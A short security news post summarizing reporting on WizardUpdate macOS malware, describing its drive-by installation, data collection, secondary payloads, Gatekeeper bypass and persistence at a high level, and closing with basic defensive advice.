WizardUpdate Has New Capabilities
Cyber Breach News & Events

Malware Update: WizardUpdate Has New Capabilities

Introduction
On October 22nd of this year, Sergiu Gatlan on BleepingComputer.com posted a story concerning new WizardUpdate malware capabilities and tactics for evading detection.

What Happened?

WizardUpdate has been around since at least November of 2020 and has been evolving to include secondary payload downloads from cloud sources and Gatekeeper bypasses.

WizardUpdate, also known as UpdateAgent and Vigram, is malware attackers use to access Macs via ‘drive-by downloads.’ These are unintentional downloads initiated when visiting infected sites and are a “silent install.” In other words, the user will not see a notification or indication of the installation. Once the installation is complete, the malware begins to collect and exfiltrate data about its running system. It also creates folders and attempts permission elevation for the account under which it resides.

As the software progresses, it may download further malware, such as ‘Adload,’ which redirects search engine traffic to create a monetary return and continues to modify system settings to allow greater access. When the malware has successfully installed, it maintains persistence and residence by removing the install file’s quarantine attribute, running persistence scheduled jobs to ensure the software stays resident, and removing files and folders once they are no longer in use.
However, one of the biggest threats is that attackers can use this malware to infiltrate much more dangerous malware with little to no problems. Without immediate detection and quarantine/removal, this application could cause massive damage and financial stress for users and organizations.

It is also important to note that many of the samples found so far are signed using valid Developer IDs issued by Apple or default Gatekeeper settings. Unfortunately, at this time, there is no mention of how the malware developers obtained the IDs.

— Update your Mac systems to the latest version
— Ensure you are using the most up-to-date antivirus and anti-malware software
— Use multi-factor authentication
— Monitor your systems and networks for unusual activity.